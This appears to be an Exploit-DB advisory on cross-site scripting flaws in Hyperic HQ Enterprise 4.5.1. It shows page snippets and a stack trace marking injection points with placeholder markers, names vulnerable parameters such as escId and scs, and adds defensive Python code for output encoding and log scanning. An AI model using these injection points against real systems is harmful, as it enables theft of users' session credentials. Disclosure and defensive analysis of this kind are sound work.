Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities
2011-11-01T00:00:00
ID: EDB-ID:36275 | Type: exploitdb | Reporter: Benjamin Kunz Mejri | Modified: 2011-11-01T00:00:00
Description
Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities. Webapps exploit for jsp platform
source: http://www.securityfocus.com/bid/50456/info
Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities.
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials. The impact of other issues is unknown.
These issues affect Hyperic HQ Enterprise 4.5.1; other versions may also be affected.
Proof of Concept:
=================
The vulnerabilities can be exploited by remote attackers or by local, low-privileged user accounts.
For demonstration or to reproduce ...
1.1
Code Review: HQ Roles [IVE - Persistent]
<td width="30%" class="BlockContent">
<!-- END VIEW MODE -->
</td></tr><tr valign="top">
<td width="20%" class="BlockLabel">Dashboard Name:</td>
<td width="30%" class="BlockContent">
<span id="dashboardString">New Role Dashboard</span></td>
<td width="20%" class="BlockLabel"></td>
<td width="30%" class="BlockContent"></td></tr></table>
<!-- / -->
Code Review: java.security.krb5.kdc Module: HQ Health / HQ Process Information & Diagnostics [IVE - Persistent]
- java.rmi.server.codebase = http://h1461735:9093/
- java.rmi.server.hostname = h1461735
- java.runtime.name = Java(TM) SE Runtime Environment
- java.runtime.version = 1.6.0_13-b03
- java.security.krb5.kdc = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
- java.security.krb5.realm = >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
- java.specification.name = Java Platform API Specification
- java.specification.vendor = Sun Microsystems Inc.
- java.specification.version = 1.6
- java.vendor = Sun Microsystems Inc.
.../PoC/printReport(poc).hqu
Code Review: Browse - Monitor - Indicators [IVE - Persistent]
hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
HQ View Application Monitor Current Health - >"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
if (arguments.callee.done) return;
... or
hyperic.data.escalation.pauseSelect.options[12] = new Option("72 hours", "259200000");
hyperic.data.escalation.pauseSelect.options[13] = new Option("Until Fixed", "9223372036854775807");
</script>
<title>
>"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>
</title>
<script type="text/javascript">
var onloads = [];
function initOnloads() {
if (arguments.callee.done) return;
arguments.callee.done = true;
if(typeof(_timer)!="undefined") clearInterval(_timer);
for ( var i = 0 ; i < onloads.length ; i++ )
onloads[i]();
Code Review: Applications - All Applications - Topic [IVE - Persistent]
<li class="hasSubmenu"><a href="">Recently Viewed</a><div><ul>
<li><a href="/Resource.do?eid=4:10001">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>;
</a></li></ul></div></li></ul></div></li><li id="analyzeTab"><a href="#">Analyze</a><div><ul>
Code Review: General Properties - Inventory over Exception-Handling [IVE - Persistent]
<div id="exception27" style="visibility:hidden">javax.servlet.jsp.JspTagException: javax.servlet.jsp.JspException:
An error occurred while evaluating custom action attribute "sort" with value "${param.scs}": An exception occured trying to convert
String ">"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>" to type "java.lang.Integer"
at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1456)
at org.hyperic.hq.ui.taglib.display.TableTag.evalAttr(TableTag.java:1438)
at org.hyperic.hq.ui.taglib.display.TableTag.evaluateAttributes(TableTag.java:1517)
at org.hyperic.hq.ui.taglib.display.TableTag.doStartTag(TableTag.java:226)
at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_display_005ftable_005f0(Unknown Source)
at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspx_meth_html_005fform_005f0(Unknown Source)
at org.apache.jsp.resource.application.inventory.ListServices_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspx_meth_tiles_005finsert_005f8(Unknown Source)
at org.apache.jsp.resource.application.inventory.ViewApplication_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_tiles_005finsert_005f0(Unknown Source)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f1(Unknown Source)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspx_meth_c_005fforEach_005f0(Unknown Source)
at org.apache.jsp.portal.ColumnsLayout_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.doInclude(ApplicationDispatcher.java:557)
at org.apache.catalina.core.ApplicationDispatcher.include(ApplicationDispatcher.java:481)
at org.apache.jasper.runtime.JspRuntimeLibrary.include(JspRuntimeLibrary.java:968)
at org.apache.jasper.runtime.PageContextImpl.include(PageContextImpl.java:609)
at org.apache.struts.tiles.TilesUtilImpl.doInclude(TilesUtilImpl.java:99)
at org.apache.struts.tiles.TilesUtil.doInclude(TilesUtil.java:135)
at org.apache.struts.taglib.tiles.InsertTag.doInclude(InsertTag.java:760)
at org.apache.struts.taglib.tiles.InsertTag$InsertHandler.doEndTag(InsertTag.java:892)
at org.apache.struts.taglib.tiles.InsertTag.doEndTag(InsertTag.java:462)
at org.apache.jsp.portal.MainLayout_jsp._jspx_meth_tiles_005finsert_005f2(Unknown Source)
at org.apache.jsp.portal.MainLayout_jsp._jspService(Unknown Source)
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.ApplicationDispatcher.invoke(ApplicationDispatcher.java:654)
at org.apache.catalina.core.ApplicationDispatcher.processRequest(ApplicationDispatcher.java:445)
at org.apache.catalina.core.ApplicationDispatcher.doForward(ApplicationDispatcher.java:379)
at org.apache.catalina.core.ApplicationDispatcher.forward(ApplicationDispatcher.java:292)
at org.apache.struts.action.RequestProcessor.doForward(RequestProcessor.java:1085)
at org.apache.struts.tiles.TilesRequestProcessor.doForward(TilesRequestProcessor.java:263)
at org.apache.struts.tiles.TilesRequestProcessor.processTilesDefinition(TilesRequestProcessor.java:239)
at org.apache.struts.tiles.TilesRequestProcessor.internalModuleRelativeForward(TilesRequestProcessor.java:341)
at org.apache.struts.action.RequestProcessor.processForward(RequestProcessor.java:572)
at org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:221)
at org.apache.struts.action.ActionServlet.process(ActionServlet.java:1196)
at org.apache.struts.action.ActionServlet.doGet(ActionServlet.java:414)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:690)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.hyperic.hq.ui.AuthenticationFilter.doFilter(AuthenticationFilter.java:167)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.hyperic.hibernate.filter.SessionFilter$1.run(SessionFilter.java:59)
at org.hyperic.hq.hibernate.SessionManager.runInSessionInternal(SessionManager.java:79)
at org.hyperic.hq.hibernate.SessionManager.runInSession(SessionManager.java:68)
at org.hyperic.hibernate.filter.SessionFilter.doFilter(SessionFilter.java:57)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:164)
at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:141)
at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:90)
at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:417)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.hyperic.hq.product.servlet.filter.JMXFilter.doFilter(JMXFilter.java:322)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:230)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:175)
at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:182)
at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:84)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:157)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:262)
at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:844)
at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:583)
at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:446)
at java.lang.Thread.run(Unknown Source) </div>
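The code reviews above all show the same defect: a value under user control (role dashboard name, monitored resource name, the "Recently Viewed" link, the `scs` request parameter echoed back inside a JSP exception message) is written into HTML without entity encoding. The following is an added example, not code from the advisory or from Hyperic HQ: it models each of those sinks with a small Python renderer that applies context-aware encoding, and checks that the advisory's own placeholder marker (reused here as constructed sample input) survives only in encoded form. All function names are hypothetical.

```python
"""Context-aware output encoding for the HTML sinks shown in the advisory.

Added example; not code from the advisory or from Hyperic HQ. It models the
places the advisory shows untrusted text landing unescaped (the role dashboard
name in a <span>, the monitor page <title>, the 'Recently Viewed' link, and a
JSP exception message echoed into a hidden <div>) and renders each one with
entity encoding instead. The marker string is the advisory's own placeholder,
reused here as constructed sample input; all function names are hypothetical.
"""
import html

# Constructed sample input: the literal placeholder the advisory writes into
# each sink, carrying the characters that matter in HTML (>, " and <).
MARKER = '>"<INCLUDE/EXECUTE PERSISTENT SCRIPT CODE HERE!!!>'


def encode_text(value: str) -> str:
    """Entity-encode a value for an HTML text node or a double-quoted
    attribute. quote=True also encodes " and ', so one helper covers both
    the element-text and the attribute sinks on the page."""
    return html.escape(value, quote=True)


def render_role_dashboard(name: str) -> str:
    """The <span id="dashboardString"> sink from the 'HQ Roles' review."""
    return '<span id="dashboardString">%s</span>' % encode_text(name)


def render_title(resource_name: str) -> str:
    """The <title> sink from the 'Browse - Monitor' review."""
    return ("<title>HQ View Application Monitor Current Health - %s</title>"
            % encode_text(resource_name))


def render_recent_link(eid: str, label: str) -> str:
    """The 'Recently Viewed' <a> sink: eid lands in an attribute, label in
    element text, so both go through the encoder."""
    return '<a href="/Resource.do?eid=%s">%s</a>' % (encode_text(eid),
                                                      encode_text(label))


def render_exception_div(exc_message: str) -> str:
    """The hidden <div id="exception27"> that echoes a JSP exception whose
    message contains the raw request parameter ${param.scs}. Encoding the
    message is the minimum fix; not echoing exception text to the browser
    at all is the better design."""
    return ('<div id="exception27" style="visibility:hidden">%s</div>'
            % encode_text(exc_message))


def value_is_neutralised(rendered: str, value: str) -> bool:
    """True when the untrusted value appears in the output only in encoded
    form: the raw text is absent, yet decoding the fragment recovers it, so
    nothing was lost except its markup meaning."""
    return value not in rendered and value in html.unescape(rendered)


if __name__ == "__main__":
    fragments = (
        render_role_dashboard(MARKER),
        render_title(MARKER),
        render_recent_link("4:10001", MARKER),
        render_exception_div('An exception occurred trying to convert String '
                             '"%s" to type "java.lang.Integer"' % MARKER),
    )
    for fragment in fragments:
        print(value_is_neutralised(fragment, MARKER), fragment)
```

The round-trip check in `value_is_neutralised` is the useful part for a reviewer: it separates "the value was encoded" from "the value was stripped or truncated", which a plain substring test cannot do. For the exception case, the encoder fixes the stored XSS, but the real regression to file is that a hidden `<div>` ships the full exception text and stack trace to every client.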
1.2
References:
http://www.example.com/admin/role/RoleAdmin.do?mode=new
http://www.example.com/hqu/health/health/printReport.hqu
http://www.example.com/Resource.do?eid=4:10001
http://www.example.com/ResourceHub.do
http://www.example.com/resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=
Code Review: Escalation Schemes Configuration [XSS]
http://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]
References:
http://www.example.com/admin/config/Config.do?mode=escalate&escId=
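The two reflected request parameters the references name (`escId` on Config.do and `scs` on Inventory.do) are visible in ordinary web-server access logs, so a defender can look back for probes against these sinks without any change to the application. The following is an added example, not part of the advisory: it scans constructed Apache-style access-log lines for requests to those two paths whose watched parameter carries HTML metacharacters, decoding once more than the query parser does so that double-encoded values are not missed. The log lines, the function names and the parameter table are assumptions made for this example.

```python
"""Access-log check for the two reflected parameters named in the advisory.

Added example, not part of the advisory. It scans constructed Apache-style
access-log lines for requests to Config.do (escId) and Inventory.do (scs)
whose value carries HTML metacharacters. Function names, log lines and the
parameter table are assumptions made for this example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Paths and the parameters the advisory names as unescaped sinks.
WATCHED = {
    "/admin/config/Config.do": {"escId"},
    "/resource/application/Inventory.do": {"scs"},
}

# Characters that only matter if the value is written into HTML unescaped.
MARKUP = re.compile(r'[<>"\']')

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one benign request, two single-encoded probes, one
# unrelated path and one double-encoded probe. Addresses and times are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Nov/2011:10:00:01 +0000] "GET /admin/config/Config.do?mode=escalate&escId=7 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [01/Nov/2011:10:00:07 +0000] "GET /admin/config/Config.do?mode=escalate&escId=%3Cprobe%3E HTTP/1.1" 200 4301',
    '10.0.0.9 - - [01/Nov/2011:10:00:12 +0000] "GET /resource/application/Inventory.do?mode=view&accord=3&eid=4:10001&sos=dec&scs=%22%3E HTTP/1.1" 200 2210',
    '10.0.0.5 - - [01/Nov/2011:10:00:20 +0000] "GET /ResourceHub.do HTTP/1.1" 200 9000',
    '10.0.0.9 - - [01/Nov/2011:10:00:31 +0000] "GET /admin/config/Config.do?mode=escalate&escId=%253Cx%253E HTTP/1.1" 200 4298',
]


def suspicious_params(target: str) -> list:
    """Return (name, decoded_value) for every watched parameter in the request
    target whose value contains HTML metacharacters after decoding."""
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path)
    if not watched:
        return []
    hits = []
    # keep_blank_values so an empty scs= (as in the reference URL) still parses
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            # parse_qs already decoded once; a second unquote catches %253C-style
            # double encoding that some filters let through
            decoded = unquote(value)
            if MARKUP.search(decoded):
                hits.append((name, decoded))
    return hits


def scan(lines) -> list:
    """Parse each log line and collect one finding per suspicious parameter."""
    findings = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        target = match.group("target")
        for name, value in suspicious_params(target):
            findings.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "path": urlsplit(target).path,
                "param": name,
                "value": value,
                "status": match.group("status"),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("%(ts)s %(ip)s %(path)s %(param)s=%(value)r (HTTP %(status)s)" % finding)
```

The stored-XSS sinks from the 1.1 reviews (dashboard name, resource name) arrive through POST bodies and authenticated UI forms rather than query strings, so this check covers only the reflected cases; for the persistent ones the application's own audit trail of role and resource edits is the place to look.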